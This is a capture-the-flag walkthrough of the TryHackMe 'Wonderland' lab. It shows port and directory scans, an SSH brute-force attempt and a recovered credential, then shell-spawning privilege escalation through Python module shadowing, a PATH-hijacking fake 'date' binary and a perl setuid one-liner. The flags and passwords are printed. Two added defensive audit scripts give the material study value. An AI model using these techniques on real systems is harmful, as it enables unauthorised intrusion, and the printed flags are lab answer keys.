Service discovery
┌──(root㉿kali)-[~]
└─# nmap -sV -Pn 10.10.86.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 02:41 EDT
Nmap scan report for 10.10.132.163
Host is up (0.33s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.63 seconds
Directory brute-forcing
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -u "http://10.10.132.163" -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100

  _|. _ _  _  _  _ _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-16_02-08-56.log

Target: http://10.10.132.163

[02:08:56] Starting:
[02:08:59] 301 -    0B  - /img  ->  img/
[02:09:00] 200 -  402B  - /
[02:09:00] 301 -    0B  - /r  ->  r/
[02:10:24] 301 -    0B  - /poem  ->  poem/
[02:10:34] 301 -    0B  - /http%3A%2F%2Fwww  ->  /http:/www
[02:12:54] 301 -    0B  - /http%3A%2F%2Fyoutube  ->  /http:/youtube
[02:13:49] 301 -    0B  - /http%3A%2F%2Fblogs  ->  /http:/blogs
[02:13:57] 301 -    0B  - /http%3A%2F%2Fblog  ->  /http:/blog
[02:14:39] 301 -    0B  - /%2A%2Ahttp%3A%2F%2Fwww  ->  /%2A%2Ahttp:/www
[02:21:21] 301 -    0B  - /http%3A%2F%2Fcommunity  ->  /http:/community
[02:21:58] 301 -    0B  - /http%3A%2F%2Fradar  ->  /http:/radar
[02:23:23] 301 -    0B  - /http%3A%2F%2Fjeremiahgrossman  ->  /http:/jeremiahgrossman
[02:23:23] 301 -    0B  - /http%3A%2F%2Fweblog  ->  /http:/weblog
[02:23:27] 301 -    0B  - /http%3A%2F%2Fswik  ->  /http:/swik
http://10.10.132.163/r is a single line of text:
Keep Going.
"Would you tell me, please, which way I ought to go from here?"
http://10.10.132.163/poem is an English poem:
The Jabberwocky

'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.

“Beware the Jabberwock, my son!
The jaws that bite, the claws that catch!
Beware the Jubjub bird, and shun
The frumious Bandersnatch!”

He took his vorpal sword in hand:
Long time the manxome foe he sought —
So rested he by the Tumtum tree,
And stood awhile in thought.

And as in uffish thought he stood,
The Jabberwock, with eyes of flame,
Came whiffling through the tulgey wood,
And burbled as it came!

One, two! One, two! And through and through
The vorpal blade went snicker-snack!
He left it dead, and with its head
He went galumphing back.

“And hast thou slain the Jabberwock?
Come to my arms, my beamish boy!
O frabjous day! Callooh! Callay!”
He chortled in his joy.

‘Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.
The hint given is: Everything is upside down here. There are three images under img/; alice_door contains a line of English text, but neither flipping it upside down nor viewing it from the side makes it readable.
alice_door.jpg
alice_door.png
white_rabbit_1.jpg
A Google search suggests it is probably the illustrator's signature; the illustrator's name is John Tenniel.
Tried brute-forcing SSH with alice as the username, but the connection kept being reset; apparently brute-forcing SSH is not the intended route.
hydra -l alice -P /usr/share/wordlists/rockyou.txt 10.10.86.51 ssh -v
Brute-forcing the r/ directory yields http://10.10.132.163/r/a
Keep Going.
"That depends a good deal on where you want to get to," said the Cat.
Repeating the brute-force yields http://10.10.132.163/r/a/b
Keep Going.
"I don’t much care where—" said Alice.
http://10.10.132.163/r/a/b/b
Keep Going.
"Then it doesn’t matter which way you go," said the Cat.
http://10.10.132.163/r/a/b/b/i/
Keep Going.
"—so long as I get somewhere,"" Alice added as an explanation.
http://10.10.132.163/r/a/b/b/...
Open the door and enter wonderland
"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."
Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving the other paw, "lives a March Hare. Visit either you like: they’re both mad."
Viewing the source of that page reveals something that looks like a login credential:
alice:HowDothTheLittleCrocodileImproveHisShiningTail
Logging in to alice's SSH account with it succeeds:
┌──(root㉿kali)-[~]
└─# ssh alice@10.10.86.51                                                                       130 ⨯
alice@10.10.132.163's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Sep 16 08:30:29 UTC 2021

  System load:  0.0                Processes:           84
  Usage of /:   18.9% of 19.56GB   Users logged in:     0
  Memory usage: 15%                IP address for eth0: 10.10.132.163
  Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 25 16:37:21 2020 from 192.168.170.1
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ ls
root.txt  walrus_and_the_carpenter.py
alice@wonderland:~$ ls -alh
total 40K
drwxr-xr-x 5 alice alice 4.0K May 25  2020 .
drwxr-xr-x 6 root  root  4.0K May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3.7K May 25  2020 .bashrc
drwx------ 2 alice alice 4.0K May 25  2020 .cache
drwx------ 3 alice alice 4.0K May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4.0K May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3.5K May 25  2020 walrus_and_the_carpenter.py
alice@wonderland:~$
There is a root flag, but of course alice has no read permission on it; the same directory also contains a Python script.
A filesystem-wide search for user.txt finds nothing.
Checking the home directories and /etc/passwd shows three more users besides alice: hatter, rabbit and tryhackme. alice has no permission to enter any of their home directories, so it looks like we need to move laterally to another user first.
Searching for every file containing the strings hatter, rabbit or tryhackme turns up nothing useful.
find / | xargs grep -ri 'hatter' -l > hatter.txt
find / | xargs grep -ri 'rabbit' -l > rabbit.txt
find / | xargs grep -ri 'tryhackme' -l > tryhackme.txt
Uploading linpeas and enumerating privilege-escalation vectors shows that perl can be used to escalate to root:
Files with capabilities (limited to 50):
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
However, alice herself has no execute permission on /usr/bin/perl, while the user hatter does, so we first need to escalate to hatter.
alice@wonderland:/etc/ldap$ ll /usr/bin/perl
-rwxr-xr-- 2 root hatter 2097720 Nov 19  2018 /usr/bin/perl*
The hint for the user flag is Everything is upside down here. Since root.txt sits at /home/alice/root.txt, user.txt must be at /root/user.txt. This one is really just a riddle...
alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}
Running sudo -l as alice shows that walrus_and_the_carpenter.py can be run as rabbit:
alice@wonderland:~$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
The source of walrus_and_the_carpenter.py is as follows:
import random

poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

# Print ten randomly chosen lines of the poem (blank stanza separators included).
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
Reading the source, the script appears to do nothing more than print 10 random lines of the poem. But if we create a random.py in the same directory with the code below, running the script under sudo gives us a shell as rabbit. This abuses Python's module search order: if a file with the same name exists in the script's directory, it is imported in preference, and only if there is none does Python look for a library module of that name.
# random.py
import os
os.system("/bin/bash")
Run it:
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
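The module-shadowing step above is worth being able to reason about from the defender's side: for a script that is allowed to run as another user via sudo, which file would its `import random` actually load, and does the script's directory contain anything that collides with the standard library? The following is an added example, not code from the original write-up or from the TryHackMe room; the function names and the constructed scratch directory are my own. It resolves an import exactly the way Python does (the script's directory first, then the rest of sys.path) and lists entries in a directory that shadow standard-library module names.

```python
# Added example (not part of the original write-up): shows which file an
# unqualified `import random` resolves to for a given script directory and
# audits that directory for files that shadow standard-library modules.
import importlib
import importlib.machinery
import os
import sys
import sysconfig
import tempfile


def stdlib_module_names():
    """Standard-library module names: sys.stdlib_module_names on Python 3.10+,
    otherwise the contents of the stdlib directory."""
    names = getattr(sys, "stdlib_module_names", None)
    if names:
        return set(names)
    stdlib_dir = sysconfig.get_paths()["stdlib"]
    found = set()
    for entry in os.listdir(stdlib_dir):
        if entry.endswith(".py"):
            found.add(entry[:-3])
        elif os.path.isdir(os.path.join(stdlib_dir, entry)):
            found.add(entry)
    return found


def resolve_module(name, script_dir):
    """Path Python would load for `name` when the importing script lives in
    `script_dir`: the script's own directory is searched before the stdlib."""
    search_path = [script_dir] + [p for p in sys.path if p != script_dir]
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    return spec.origin if spec is not None else None


def shadowing_entries(script_dir):
    """Modules or packages in `script_dir` whose names collide with the stdlib."""
    stdlib = stdlib_module_names()
    hits = []
    for entry in sorted(os.listdir(script_dir)):
        full = os.path.join(script_dir, entry)
        if entry.endswith(".py"):
            name = entry[:-3]
        elif os.path.isfile(os.path.join(full, "__init__.py")):
            name = entry
        else:
            continue
        if name in stdlib:
            hits.append(entry)
    return hits


def demo():
    """Constructed scenario: a script directory that gains a `random.py` next to
    a script doing `import random`. The stand-in file holds only a comment."""
    with tempfile.TemporaryDirectory() as script_dir:
        before = resolve_module("random", script_dir)
        with open(os.path.join(script_dir, "random.py"), "w") as fh:
            fh.write("# constructed stand-in for a module shadowing the stdlib\n")
        importlib.invalidate_caches()  # make the path finder re-read the directory
        after = resolve_module("random", script_dir)
        return {
            "stdlib_wins_when_clean": before is not None
            and not before.startswith(script_dir),
            "local_file_wins_when_present": after == os.path.join(script_dir, "random.py"),
            "shadowing": shadowing_entries(script_dir),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The root cause on this box is that the sudo rule points at a script in a directory the invoking user owns. Two mitigations follow directly: keep scripts that run under sudo in a directory writable only by root, and run the interpreter in isolated mode (`python3 -I`), which leaves the script's directory off sys.path so a file dropped beside the script cannot shadow a standard-library import.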
Now that we have a shell as rabbit, we find a binary named teaParty in /home/rabbit. Running it prompts for input:
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Fri, 17 Sep 2021 07:42:14 +0000
Ask very nicely, and I will give you some tea while you wait for him
hello?
Segmentation fault (core dumped)
We copy the teaParty binary back to the Kali attack box and inspect it with strings (strings searches object or binary files for printable strings; a string is any sequence of 4 or more printable characters terminated by a newline or a null character):
┌──(root㉿kali)-[~/tryhackme/wonderland]
└─# strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
Look at this line in particular:
/bin/echo -n 'Probably by ' && date --date='next hour' -R
It first runs /bin/echo -n 'Probably by ' and then date --date='next hour' -R. The date command is invoked without a path, so, just like the Python module lookup above, the shell walks the directories in $PATH in order and executes the first file named date that it finds.
Check the current $PATH:
rabbit@wonderland:/home/rabbit$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Prepend /tmp to $PATH:
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Create a file named date under /tmp with the following content, then chmod +x /tmp/date:
#!/bin/bash
/bin/bash
Run teaParty again and we get a shell as hatter:
rabbit@wonderland:/home/rabbit$ vim /tmp/date
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ whoami
hatter
hatter@wonderland:/home/rabbit$ id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
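The PATH lookup that teaParty relies on is something an auditor can check mechanically: given the PATH a privileged program will run under, which entries could an unprivileged user have written to, and which binary would an unqualified name such as `date` resolve to? The following is an added example, not code from the original write-up or from the room; the function names, the scratch directory and the benign stand-in `date` file (which only echoes a fixed string) are constructed for the demonstration. Writability is judged from the mode bits of each directory rather than from os.access(), so the verdict is about the user being audited, not about whoever runs the script.

```python
# Added example (not part of the original write-up): audits a PATH value for
# entries an unprivileged user can write to and shows which executable an
# unqualified command name such as `date` resolves to under that PATH.
import os
import shutil
import stat
import tempfile


def writable_by(path, uid, gid):
    """True if user (uid, gid) may write to `path`, judged from the mode bits
    rather than os.access(), so the verdict does not depend on who runs the audit."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def risky_path_entries(path_value, uid, gid):
    """(entry, reason) pairs for PATH entries that are relative or writable by
    the user; either lets that user supply the binary an unqualified lookup finds."""
    risky = []
    for entry in path_value.split(os.pathsep):
        if not os.path.isabs(entry):
            risky.append((entry, "relative entry, resolved against the cwd"))
        elif writable_by(entry, uid, gid):
            risky.append((entry, "writable by uid %d" % uid))
    return risky


def resolve_command(name, path_value):
    """First executable called `name` along `path_value`, i.e. what a shell or a
    system() call runs for an unqualified command."""
    return shutil.which(name, path=path_value)


def demo():
    """Constructed scenario mirroring the write-up: a directory writable by the
    current user is prepended to the system PATH and holds a file named `date`
    (a benign stand-in that only echoes a string)."""
    uid, gid = os.getuid(), os.getgid()
    system_path = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    with tempfile.TemporaryDirectory() as writable_dir:
        locked_dir = os.path.join(writable_dir, "locked")
        os.mkdir(locked_dir, 0o555)  # readable but not writable: must not be flagged
        planted = os.path.join(writable_dir, "date")
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\necho constructed-stand-in\n")
        os.chmod(planted, 0o755)
        audited = os.pathsep.join([writable_dir, locked_dir, system_path])
        return {
            "writable_dir": writable_dir,
            "locked_dir": locked_dir,
            "planted": planted,
            "risky": [entry for entry, _ in risky_path_entries(audited, uid, gid)],
            "unqualified_date": resolve_command("date", audited),
            "system_date": resolve_command("date", system_path),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Note the contrast with the sudo step earlier: the sudo -l output shows `secure_path`, which is exactly the control that stops this trick for commands run through sudo, but it does nothing for a setuid/setgid binary such as teaParty that the user launches directly with their own environment. A program that changes privilege and then calls system() should either reference every command by absolute path or reset PATH itself before the call.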
hatter's home directory holds the SSH password:
hatter@wonderland:/home/rabbit$ cat /home/hatter/password.txt
WhyIsARavenLikeAWritingDesk?
Log in as hatter over SSH to get a full shell as hatter, then, following the earlier linpeas result, use perl to escalate to root (see https://gtfobins.github.io/gt...):
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
# cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
Summary
A very well-made box. I took quite a few detours, and learned how privilege escalation can be achieved through the way programs look up the files they reference.